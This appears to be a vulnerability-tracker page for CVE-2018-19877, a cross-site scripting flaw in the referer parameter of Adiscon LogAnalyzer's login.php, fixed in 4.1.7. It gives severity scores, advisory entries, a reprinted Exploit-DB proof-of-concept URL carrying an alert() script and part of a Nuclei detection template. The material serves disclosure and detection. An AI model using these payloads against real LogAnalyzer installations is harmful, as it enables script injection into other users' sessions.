CVE-2018-19877
published 2018-12-05CVE-2018-19877: login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
PriorityP346medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
18.56%
96.9th percentile
login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adiscon | loganalyzer | < 4.1.7 | 4.1.7 |
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
osv6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5jc5-95gm-6p5f: login
ghsa_unreviewed·2022-05-14
CVE-2018-19877 [MEDIUM] CWE-79 GHSA-5jc5-95gm-6p5f: login
login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
OSV
CVE-2018-19877: login
osv·2018-12-05·CVSS 6.1
CVE-2018-19877 [MEDIUM] CVE-2018-19877: login
login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
No detection rules found.
Exploit-DB
Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting
exploitdb·2018-12-09·CVSS 6.1
CVE-2018-19877 [MEDIUM] Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting
Adiscon LogAnalyzer https://github.com/rsyslog/loganalyzer
# *
# Exploit Author: Gustavo Sorondo
# Contact: http://twitter.com/iampuky
# Website: http://cintainfinita.com/
# CVE: CVE-2018-19877
# Category: webapps
# 1. Description
# Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS)
# in the 'referer' parameter of the login.php file.
# 2. Proof of Concept
http://my.loganalyzer.instance/login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E
# 3. Solution:
# Update to version 4.1.7.
# https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
Nuclei
Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2018-19877 [MEDIUM] Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
Adiscon LogAnalyzer confirm(document.domain)'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a004730450221008b24b18725fc287b580f08aba99ff28b8453b2205fad283a28fc8fc57a1fd933022049e6935a36ba4bb79bffb283af448de6092b0b74271e454a89437249f6bff147:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2018-12-05
Published